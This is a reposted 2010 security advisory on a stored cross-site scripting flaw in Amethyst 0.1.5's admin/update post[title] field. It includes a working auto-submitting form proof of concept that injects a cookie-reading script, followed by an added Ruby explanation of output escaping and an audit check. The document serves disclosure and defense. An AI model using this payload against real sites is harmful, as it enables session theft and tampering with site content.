[Repost] Amethyst v0.1.5 XSS Vulnerability
Posted on: 2010-8-7 16:04
Vulnerability ID: HTB22502
Product: Amethyst
Vendor: Hulihan Applications
Vulnerable Version: 0.1.5 and Probably Prior Versions
Vendor Notification: 22 July 2010
Vulnerability Type: Stored XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing
Vulnerability Details:
An attacker can execute arbitrary JavaScript code within the vulnerable application.
The vulnerability exists because the admin/update script fails to properly sanitize user-supplied input in the "post[title]" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.
An attacker can use a browser to exploit this vulnerability. The following PoC is available:
<form action="http://host/admin/update/2" method="post" name="main" >
<input type="hidden" name="post[title]" value='title"><script>alert(document.cookie)</script>' />
<input type="hidden" name="post[content]" value="this is my post" />
<input type="hidden" name="post[created_at(1i)]" value="2010" />
<input type="hidden" name="post[created_at(2i)]" value="7" />
<input type="hidden" name="post[created_at(3i)]" value="15" />
<input type="hidden" name="post[created_at(4i)]" value="20" />
<input type="hidden" name="post[created_at(5i)]" value="39" />
<input type="hidden" name="post[updated_at(1i)]" value="2010" />
<input type="hidden" name="post[updated_at(2i)]" value="7" />
<input type="hidden" name="post[updated_at(3i)]" value="15" />
<input type="hidden" name="post[updated_at(4i)]" value="20" />
<input type="hidden" name="post[updated_at(5i)]" value="39" />
<input type="hidden" name="commit" value="Create" />
</form>
<script>
document.main.submit();
</script>
Solution: Upgrade to the most recent version
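As an added illustration (not part of the advisory and not Amethyst's own code), the Ruby below shows why the advisory's post[title] payload becomes live markup when a Rails-style view interpolates the stored title without escaping, and how HTML output escaping neutralises it. The two render functions and the suspicious_title? check are hypothetical; only the payload string comes from the PoC above.

```ruby
require "erb"

# Constructed sample title, taken from the advisory's PoC form field.
POC_TITLE = 'title"><script>alert(document.cookie)</script>'

# Vulnerable rendering (hypothetical view logic): the stored title is
# interpolated into an attribute and into element content with no escaping.
# The payload's leading '">' closes the attribute and the tag early, so the
# following <script> element is parsed as real markup by the browser.
def render_title_unescaped(title)
  %(<h2 class="post-title" data-title="#{title}">#{title}</h2>)
end

# Hardened rendering: every untrusted value is HTML-escaped before it is
# placed in an attribute value or in element content. In Rails views this is
# what <%= %> does by default for strings that are not marked html_safe; the
# bug class here is typically a view that uses raw, <%== %> or html_safe on
# user-controlled data.
def render_title_escaped(title)
  safe = ERB::Util.html_escape(title)
  %(<h2 class="post-title" data-title="#{safe}">#{safe}</h2>)
end

# Defensive audit helper for data already in the posts table: flag titles
# containing characters that can break out of an attribute or open a tag,
# so an operator can review rows written before the fix was deployed.
def suspicious_title?(title)
  title.match?(/[<>"']|&#|javascript:/i)
end

if __FILE__ == $PROGRAM_NAME
  puts "unescaped: #{render_title_unescaped(POC_TITLE)}"
  puts "escaped:   #{render_title_escaped(POC_TITLE)}"
  puts "flagged:   #{suspicious_title?(POC_TITLE)}"
end
```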